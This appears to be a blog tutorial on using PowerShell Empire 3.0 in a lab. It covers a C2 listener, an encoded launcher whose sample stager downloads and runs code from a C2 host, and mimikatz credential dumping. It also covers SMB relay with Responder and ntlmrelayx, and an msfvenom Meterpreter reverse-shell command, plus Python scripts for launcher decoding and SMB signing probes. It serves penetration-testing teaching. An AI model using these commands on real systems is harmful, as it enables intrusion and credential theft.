
BC-Security now maintains a fork of the original Empire project, released as PowerShell Empire 3.0. In the online ethical hacking course Become An Ethical Hacker you will learn how to use PowerShell Empire 3.0 for Windows privilege escalation and network penetration testing.

How To Install PowerShell Empire

According to the official GitHub page, you can install Empire either from the Kali repository or by cloning the GitHub repo.

Kali

On Kali you can install the packaged version of Empire by running:

sudo apt install powershell-empire

GitHub

To install from source:

git clone https://github.com/BC-SECURITY/Empire.git
cd Empire
sudo ./setup/install.sh

Setting Up A Listener

The first step is to start PowerShell Empire 3.0; the next is to set up a listener.

Every option the listener marks as required must be set before it will start. The listening port is one of them; I will use 4444.

Once the required options are set, start the listener with the execute command. This starts a Python Flask HTTP web application that acts as the command and control (C2) server you will use to task agents.

Execute Launcher For Your First Empire Agent

For simplicity's sake we can use PowerShell ISE to execute an Empire launcher. Copy the generated launcher (a powershell command whose -enc argument carries the stager script as base64-encoded UTF-16LE) and paste it into a PowerShell ISE prompt to run it and get an agent back on your new listener.

Press Enter and make sure that antivirus is not blocking execution. The stock, unobfuscated launcher is widely signatured, so on an up-to-date host expect Defender and AMSI to stop it unless it is obfuscated or AV is disabled in the lab.
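To see what is actually being pasted into ISE, here is an added example (my code, not Empire's and not from the original post) that builds a launcher of the same shape from a constructed stand-in for the stager, decodes one back from a command line the way a responder would when it turns up in process-creation logs, pulls the C2 URL out of it, and flags the launcher's flag combination. The stager text, the host 10.0.0.197:4444 and the URI are assumptions for illustration, not Empire's real stager.

```python
import base64
import re
import shlex

# Constructed stand-in for an Empire PowerShell stager: NOT Empire's real
# stager, just a snippet shaped like one (a C2 host, a URI, a spoofed
# User-Agent and a download cradle) so the round trip has a realistic input.
SAMPLE_STAGER = (
    "$wc=New-Object System.Net.WebClient;"
    "$ua='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';"
    "$wc.Headers.Add('User-Agent',$ua);"
    "$ser='http://10.0.0.197:4444';$t='/login/process.php';"
    "$data=$wc.DownloadData($ser+$t);"
    "IEX ([System.Text.Encoding]::UTF8.GetString($data))"
)


def build_launcher(script: str) -> str:
    """Wrap a script the way powershell -EncodedCommand expects it: the
    script as UTF-16LE bytes, base64 encoded, after the -enc switch. The
    flag set (-noP -sta -w 1 -enc) is the one Empire's launcher prints."""
    encoded = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell -noP -sta -w 1 -enc {encoded}"


def decode_launcher(cmdline: str) -> str:
    """Recover the plaintext script from a powershell command line carrying
    an -e/-enc/-EncodedCommand argument (PowerShell accepts any unambiguous,
    case-insensitive prefix). Raises ValueError if none is present."""
    args = shlex.split(cmdline)
    for i, arg in enumerate(args[:-1]):
        switch = arg.lower()
        if switch.startswith("-e") and "-encodedcommand".startswith(switch):
            raw = base64.b64decode(args[i + 1], validate=True)
            return raw.decode("utf-16-le")
    raise ValueError("no -EncodedCommand argument found")


def extract_iocs(script: str) -> dict:
    """Pull what a defender wants from the decoded script: C2 URLs
    (host, optional port, optional path) and the spoofed User-Agent."""
    urls = re.findall(r"https?://[\w.\-]+(?::\d+)?(?:/[\w./\-]*)?", script)
    ua = re.search(r"'(Mozilla[^']*)'", script)
    return {"urls": sorted(set(urls)), "user_agent": ua.group(1) if ua else None}


def looks_like_empire_launcher(cmdline: str) -> bool:
    """Cheap process-creation-log heuristic: the stock launcher's flag
    combination is rare in legitimate administration. Treat a hit as a
    lead to decode, not as proof; tune before relying on it."""
    lowered = cmdline.lower()
    return all(flag in lowered for flag in ("-nop", "-sta", "-w 1", "-enc"))


if __name__ == "__main__":
    launcher = build_launcher(SAMPLE_STAGER)
    print(launcher[:80] + "...")
    print("empire-like:", looks_like_empire_launcher(launcher))
    print(extract_iocs(decode_launcher(launcher)))
```

Decoding is the first thing to do with any -enc command line found in Sysmon or 4688 logs; the flag heuristic only tells you which ones to decode first.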

Using PowerShell Empire Agents

Your listener will automatically print the activity, showing that a new agent has just checked in.

I prefer to rename the agents to a friendlier name.

Using Mimikatz With PowerShell Empire

You can use mimikatz with PowerShell Empire 3 to dump credentials from memory. When we ran the Empire launcher it was running under the beh user context, which is a local administrator account, but the process itself was not elevated: under UAC the agent holds a medium-integrity token, which is not enough to read LSASS memory.

To solve this, keeping things simple, run PowerShell ISE as administrator (accept the UAC prompt) and paste the Empire launcher into it once more.

Notice the asterisk next to the username for agent2. This means the agent is running in a high-integrity (elevated) context as a local administrator.

Next we need the usemodule command to select a module, for example powershell/credentials/mimikatz/logonpasswords for mimikatz's sekurlsa::logonpasswords. Note: once you issue the task to the agent, wait a minute for it to launch and complete. The agent only picks the task up on its next check-in and mimikatz itself takes a few seconds, so if you do not wait you will likely need to go back and do it again.

Why are the password fields empty? The (null) values appear where plaintext passwords would once have been found in memory. On Windows 8.1 and Server 2012 R2 and later (and on older systems with KB2871997 applied) the WDigest provider no longer caches plaintext credentials by default, so mimikatz recovers only the NTLM hash rather than the hash plus the cached plaintext password. The hash is still enough for pass-the-hash. An attacker with local admin can turn caching back on by setting HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential to 1, but plaintext only appears for logons that happen after the change.

Execute Empire Launcher With SMB Relay Attack

As of this writing in November 2020, using Impacket's smbrelayx to execute a payload via an SMB relay attack is not working. If you have had a different experience, please let me know in the comments!

The steps to perform an SMB relay attack are simple, however. Relaying only succeeds against targets that do not require SMB signing (domain controllers require it by default; on Windows 10-era workstations and member servers it is enabled but not required by default), so check that before picking targets.

  • Create a payload.
  • Edit Responder.conf to turn off its HTTP and SMB servers, so that the relay tool can bind ports 80 and 445 itself while Responder keeps poisoning name lookups.
  • Start Responder.
  • Start ntlmrelayx (or smbrelayx) with parameters to send the new payload to a target host.
  • Trigger an SMB request from a victim for a name that does not resolve (net view \\fakeshare), so the victim falls back to LLMNR/NBT-NS and Responder's poisoned answer sends its authentication to the relay.

If you are using a staged Meterpreter payload (windows/meterpreter/reverse_tcp) then you need exploit/multi/handler listening with the same payload configured to get the shell back.

Create a meterpreter payload using msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.197 LPORT=1234 -f exe -o payload.exe

Start a multi/handler in Metasploit, with the payload set to match what msfvenom produced (the handler's default is a generic shell, which will not stage Meterpreter):

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.0.0.197
LHOST => 10.0.0.197
msf5 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf5 exploit(multi/handler) > run

Edit Responder.conf to turn off its HTTP and SMB servers (the relay tool needs those ports):

root@kali:/home/kali# nano /etc/responder/Responder.conf

; Servers to start
SQL = On
SMB = Off
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On

Start Responder on the interface facing the victims so it answers LLMNR and NBT-NS name lookups with poisoned responses.

Now send fake network requests to kick off the whole scheme.

On a Windows target (Windows 10, for example) type net view \\fakeshare. Because the name does not resolve through DNS, the host falls back to LLMNR and NBT-NS and accepts Responder's poisoned answer.

Start Ntlmrelayx Or Smbrelayx To Send The Payload

ntlmrelayx.py -tf targets.txt -c '<Empire launcher code here>'

Or alternatively you can send an executable with smbrelayx:

root@kali:/home/kali/impacket-master/examples# smbrelayx.py -h 10.0.0.64 -e /home/kali/payload.exe

It looks like smbrelayx is still not working, since it always ends with a timeout.
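Since relaying only works where the target does not require SMB signing, here is an added example (my code, not part of the post and not Impacket's) that sends a raw SMB2 NEGOTIATE to port 445, reads the SecurityMode flags from the response, and builds the host list for ntlmrelayx -tf from the hosts that answered without SIGNING_REQUIRED. The constructed response builder exists only to exercise the parser offline; the script name and the hosts in the usage comment are placeholders.

```python
import socket
import struct
import sys
import uuid
from typing import List, Optional

SIGNING_ENABLED = 0x0001   # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002  # SMB2_NEGOTIATE_SIGNING_REQUIRED
SMB2_DIALECTS = (0x0202, 0x0210, 0x0300, 0x0302)  # 2.0.2, 2.1, 3.0, 3.0.2

HEADER_FMT = "<4sHHIHHIIQIIQ16s"  # MS-SMB2 2.2.1.2 sync header, 64 bytes


def smb2_header(command: int, flags: int = 0) -> bytes:
    # ProtocolId, StructureSize, CreditCharge, Status, Command, CreditRequest,
    # Flags, NextCommand, MessageId, Reserved, TreeId, SessionId, Signature
    return struct.pack(HEADER_FMT, b"\xfeSMB", 64, 0, 0, command, 1,
                       flags, 0, 0, 0, 0, 0, b"\x00" * 16)


def build_negotiate_request(client_guid: Optional[bytes] = None) -> bytes:
    """SMB2 NEGOTIATE request (MS-SMB2 2.2.3) behind a NetBIOS session
    service length prefix, as sent straight to TCP/445. We advertise
    signing as enabled but not required, which is what a relay does."""
    body = struct.pack("<HHHHI16sQ",
                       36,                  # StructureSize, fixed
                       len(SMB2_DIALECTS),  # DialectCount
                       SIGNING_ENABLED,     # client SecurityMode
                       0,                   # Reserved
                       0,                   # Capabilities
                       client_guid or uuid.uuid4().bytes,
                       0)                   # ClientStartTime (pre-3.1.1 layout)
    body += b"".join(struct.pack("<H", d) for d in SMB2_DIALECTS)
    message = smb2_header(command=0) + body  # command 0 = NEGOTIATE
    return struct.pack(">I", len(message)) + message  # 0x00 + 24-bit length


def build_negotiate_response(security_mode: int) -> bytes:
    """Constructed, minimal NEGOTIATE response (header plus the first three
    body fields: StructureSize, SecurityMode, DialectRevision), used only
    to exercise the parser offline."""
    body = struct.pack("<HHH", 65, security_mode, 0x0302)
    return smb2_header(command=0, flags=0x1) + body  # 0x1: SERVER_TO_REDIR


def parse_security_mode(message: bytes) -> int:
    """Return SecurityMode from an SMB2 NEGOTIATE response (NetBIOS prefix
    already stripped). Hosts answering with SMB1 (0xFF 'SMB') or anything
    else raise ValueError instead of being misreported as relayable."""
    if len(message) < 64 + 6 or message[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 message")
    (command,) = struct.unpack_from("<H", message, 12)
    structure_size, security_mode, _dialect = struct.unpack_from("<HHH", message, 64)
    if command != 0 or structure_size != 65:
        raise ValueError("not a NEGOTIATE response")
    return security_mode


def signing_required(security_mode: int) -> bool:
    return bool(security_mode & SIGNING_REQUIRED)


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise OSError("connection closed early")
        buf += chunk
    return buf


def probe(host: str, port: int = 445, timeout: float = 5.0) -> Optional[bool]:
    """True if host requires signing, False if it does not, None if it is
    unreachable or did not return an SMB2 NEGOTIATE response."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(build_negotiate_request())
            (length,) = struct.unpack(">I", _recv_exact(sock, 4))
            message = _recv_exact(sock, length & 0x00FFFFFF)
        return signing_required(parse_security_mode(message))
    except (OSError, ValueError):
        return None


def relay_targets(hosts: List[str]) -> List[str]:
    """Hosts worth listing in targets.txt: SMB2 speakers that do not
    require signing. Unreachable hosts are left out, not guessed."""
    return [h for h in hosts if probe(h) is False]


if __name__ == "__main__":
    # python3 check_signing.py 10.0.0.64 10.0.0.65 > targets.txt  (hosts assumed)
    for target in relay_targets(sys.argv[1:]):
        print(target)
```

A target that reports SIGNING_REQUIRED will accept the relayed authentication and then reject every signed request, which from the relay side looks much like the timeouts described above, so run this before blaming the tool.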

Want to learn more ethical hacking? I highly recommend buying my book for beginners to pentesting, Become An Ethical Hacker. Check the price on Amazon.
